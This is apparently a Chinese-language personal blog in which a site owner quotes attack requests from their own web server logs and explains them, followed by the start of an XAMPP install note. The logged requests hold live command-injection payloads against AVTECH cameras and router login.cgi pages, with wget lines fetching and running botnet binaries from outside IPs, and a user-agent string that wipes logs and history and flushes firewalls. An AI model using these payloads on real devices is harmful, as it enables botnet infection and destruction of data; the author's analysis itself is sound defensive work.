2018年10月29日 星期一
2018年10月28日 星期日
2018年10月18日 星期四
從 Web Log 學習系統漏洞 26
來自捷克使用Linux系統的Router Webserver, 嘗試下載 avtech 這個程式(指令), 變更權限後再執行
77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"
下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm
內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行
經掃描結果確定為後門
77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"
下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm
內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行
經掃描結果確定為後門
2018年10月17日 星期三
2018年10月16日 星期二
從 Web Log 學習系統漏洞 25-1
這兩天埃及人對我網站很有興趣...
41.44.204.188 - - [15/Oct/2018:21:31:31 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
197.58.70.109 - - [15/Oct/2018:21:59:29 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.34.99.205 - - [16/Oct/2018:09:24:12 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.42.219.91 - - [16/Oct/2018:09:41:19 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:35 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:38 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:44 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.44.204.188 - - [15/Oct/2018:21:31:31 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
197.58.70.109 - - [15/Oct/2018:21:59:29 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.34.99.205 - - [16/Oct/2018:09:24:12 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.42.219.91 - - [16/Oct/2018:09:41:19 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:35 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:38 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:44 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
2018年10月15日 星期一
從 Web Log 學習系統漏洞 25
今天的東西很有趣, 雖然用跟之前同樣的方式入侵, 不過這次發現居然連HTTP_USER_AGENT也能附帶指令.
先從80.211.203.234下載程式bin, 執行後再刪除所有執行紀錄, 再幫你把防火牆給關了, 不過這個80.211.203.234的站似乎連不上啊
219.110.165.8 - - [15/Oct/2018:09:29:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
2018年10月10日 星期三
從 Web Log 學習系統漏洞 24
雖然使用了套件模組阻擋了一堆phpmyadmin的DDos偵測攻擊, 不過對方還是能持續連線, 而不能直接阻擋連線, 算了, 反正對方也連不進來
36.106.84.60 - - [09/Oct/2018:17:32:27 +0800] "GET /device_description.xml HTTP/1.1" 404 220 "-" "-"
似乎是一款"Sonos bridge"的分享器漏洞
36.106.84.60 - - [09/Oct/2018:17:32:28 +0800] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1" 403 232 "-" "-"
"AVTECH IP Camera"網路攝影機漏洞? 連這東西也被當成跳板了?
212.237.44.126 - - [10/Oct/2018:10:56:44 +0800] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 403 237 "-" "core-project/1.0"
好像是古老的 Windows NT 及 IIS 漏洞?
2018年10月6日 星期六
試用 XAMPP-7.2.10
之前試用過XAMPP這套裝架站軟體, 雖然很方便所有伺服器都打包在一起不用另外在一一比對相容性, 但是發現這東西有不少漏洞, 以常常跑來我網站的入侵紀錄來看, 有不少網站是用這軟體架站, 漏洞沒補就被人入侵利用拿來當跳板了, 不過新版的似乎把這些漏洞補起來了, 開啟首頁不會直接連到管理頁面
軟體版本編號現在似乎是跟著PHP的版本號(7.2.10), 不過內部使用介面時又變成另一個(3.2.2), 真讓人搞混
1. 安裝方式跟之前一樣
2. 選擇要安裝的Server及工具
